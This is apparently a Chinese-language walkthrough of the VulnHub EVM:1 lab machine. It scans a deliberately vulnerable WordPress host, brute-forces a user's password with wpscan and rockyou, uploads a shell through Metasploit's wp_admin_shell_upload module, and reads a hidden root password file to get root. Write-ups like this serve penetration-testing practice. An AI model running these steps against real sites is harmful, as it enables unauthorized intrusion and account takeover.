这次的靶机是EVM:1,其实就是对wordpress网站的简单渗透
0x00: 靶机下载
下载链接: https://www.vulnhub.com/entry/evm-1,391/
看了一下描述友好级别也是建议用VirtualBox比较好
下载完以后我用VirutalBox打开,建议kali和EVM1都设置成桥接网卡比较容易获取到IP
0x01: 探测靶机
先用netdiscover探测一波,排除.1,默认网关以及一些我的手机设备可以确定靶机IP为192.168.3.184
命令:netdiscover-r 192.168.3.0/16
开始用nmap探测端口,主要开了22,53,80,110,139,143以及445端口
命令:nmap-A -sS -sV -v -p- 192.168.3.184
0x02: 挖掘漏洞
先正常输入一下IP地址,能正常回显而且地下有一行 you can find me at /wordpress/ in vulnerable webapp 已经暗示了这是一个wordpress的站
这里有点奇怪的是192.168.3.184/wordpress这个页面即使更改了hosts文件也是加载的十分缓慢。。。。可能是我更改错了
不过没什么影响先用wpscan扫一波,扫到一个用户c0rrupt3d_brain
命令:wpscan–url http://192.168.3.184 -e u
继续,由于浏览不到主页使用爆破技术,爆出一个用户名和密码出来
命令:wpscan --url http://192.168.3.184/wordpress -U c0rrupt3d_brain -P/usr/share/wordlists/rockyou.txt
0x03: 利用MSF上传shell
由于我们知道了账号密码所以可以用MSF自带的模块上传shell
命令:useexploit/unix/webapp/wp_admin_shell_upload
Set RHOST 192.168.3.184
Set PASSWORD xxxxx
Set USERNAME xxxxx
Set TARGETURI /wordpress
run
成功,顺利进入shell模式
0x04:挖掘信息
来到/home/root3r目录下发现一个test.txt然而没啥东西,为了防止漏掉东西直接ls-la查到一个.root_password_ssh.txt的东西
Cat 以后得到一串字符应该是密码,直接切换root用户成功登录读到flag
本文始发于微信公众号(疯猫网络):通关vulnhub靶机(六)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论